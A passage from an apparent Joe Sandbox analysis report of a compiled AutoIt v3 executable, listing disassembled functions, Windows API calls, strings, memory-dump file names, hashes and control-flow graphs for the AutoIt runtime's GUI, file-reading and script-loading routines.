                                                                                              • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                              • TranslateMessage.USER32(?), ref: 00409556
                                                                                              • DispatchMessageW.USER32(?), ref: 00409561
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchSleepTranslate
                                                                                              • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                              • API String ID: 1762048999-758534266
                                                                                              • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                              • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                              • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                              • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                              Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                              • __wcsicoll.LIBCMT ref: 00402007
                                                                                              • __wcsicoll.LIBCMT ref: 0040201D
                                                                                              • __wcsicoll.LIBCMT ref: 00402033
                                                                                                • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                              • __wcsicoll.LIBCMT ref: 00402049
                                                                                              • _wcscpy.LIBCMT ref: 0040207C
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                              • API String ID: 3948761352-1609664196
                                                                                              • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                              • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                              • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                              • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                              Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                              • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                              • _wcsncat.LIBCMT ref: 0040E433
                                                                                              • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              • _wcscpy.LIBCMT ref: 0040E487
                                                                                                • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                              • _wcscat.LIBCMT ref: 00427541
                                                                                              • _wcslen.LIBCMT ref: 00427551
                                                                                              • _wcslen.LIBCMT ref: 00427562
                                                                                              • _wcscat.LIBCMT ref: 0042757C
                                                                                              • _wcsncpy.LIBCMT ref: 004275BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                              • String ID: Include$\
                                                                                              • API String ID: 3173733714-3429789819
                                                                                              • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                              • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                              • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                              • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                              Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • _fseek.LIBCMT ref: 0045292B
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                              • __fread_nolock.LIBCMT ref: 00452961
                                                                                              • __fread_nolock.LIBCMT ref: 00452971
                                                                                              • __fread_nolock.LIBCMT ref: 0045298A
                                                                                              • __fread_nolock.LIBCMT ref: 004529A5
                                                                                              • _fseek.LIBCMT ref: 004529BF
                                                                                              • _malloc.LIBCMT ref: 004529CA
                                                                                              • _malloc.LIBCMT ref: 004529D6
                                                                                              • __fread_nolock.LIBCMT ref: 004529E7
                                                                                              • _free.LIBCMT ref: 00452A17
                                                                                              • _free.LIBCMT ref: 00452A20
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1255752989-0
                                                                                              • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                              • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                              • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                              • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                              Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock$_fseek_wcscpy
                                                                                              • String ID: FILE
                                                                                              • API String ID: 3888824918-3121273764
                                                                                              • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                              • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                              • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                              • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                              Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                              • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                              • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                              • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                              • ImageList_ReplaceIcon.COMCTL32(009714F8,000000FF,00000000), ref: 00410552
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                              • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                              • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                              • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                              Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                              • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                              • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                              • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                              • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                              • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009714F8,000000FF,00000000), ref: 00410552
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                              • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                              • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                              • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                              Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _malloc
                                                                                              • String ID: Default
                                                                                              • API String ID: 1579825452-753088835
                                                                                              • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                              • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                              • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                              • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                              Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1974 40f679-40f67c 1969->1974 1971 40f640 1970->1971 1973 40f642-40f650 1971->1973 1975 40f652-40f655 1973->1975 1976 40f67e-40f68c 1973->1976 1974->1963 1979 40f65b-40f65e 1975->1979 1980 425d1e-425d3e call 4150d1 call 414d04 1975->1980 1977 40f68e-40f68f 1976->1977 1978 40f69f-40f6ad 1976->1978 1977->1975 1981 40f6b4-40f6c2 1978->1981 1982 40f6af-40f6b2 1978->1982 1979->1969 1979->1971 1990 425d43-425d5f call 414d30 1980->1990 1984 425d16 1981->1984 1985 40f6c8-40f6d6 1981->1985 1982->1975 1984->1980 1988 425d05-425d0b 1985->1988 1989 40f6dc-40f6df 1985->1989 1988->1973 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1984
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_fseek_memmove_strcat
                                                                                              • String ID: AU3!$EA06
                                                                                              • API String ID: 1268643489-2658333250
                                                                                              • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                              • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                                              • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                                              • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                                              Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2016 4011af 2010->2016 2011->2009 2012->2001 2019 401225-42b06d call 468b0e 2012->2019 2017 401163-401166 2013->2017 2018 42b01d-42b024 2013->2018 2016->2001 2022 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2016->2022 2023 4011db-401202 SetTimer RegisterWindowMessageW 2016->2023 2025 42afe9-42b018 call 40f190 call 401a50 2017->2025 2026 40116c-401172 2017->2026 2018->2000 2024 42b02a-42b033 call 4370f4 2018->2024 2019->2009 2023->2009 2032 401204-401216 CreatePopupMenu 2023->2032 2024->2000 2025->2000 2026->2001 2034 401174-42afde call 45fd57 2026->2034 2034->2000 2045 42afe4 2034->2045 2045->2009
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                              • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                              • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                              • CreatePopupMenu.USER32 ref: 00401204
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: TaskbarCreated
                                                                                              • API String ID: 129472671-2362178303
                                                                                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                              Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 004115F1
                                                                                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                              • std::exception::exception.LIBCMT ref: 00411626
                                                                                              • std::exception::exception.LIBCMT ref: 00411640
                                                                                              • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
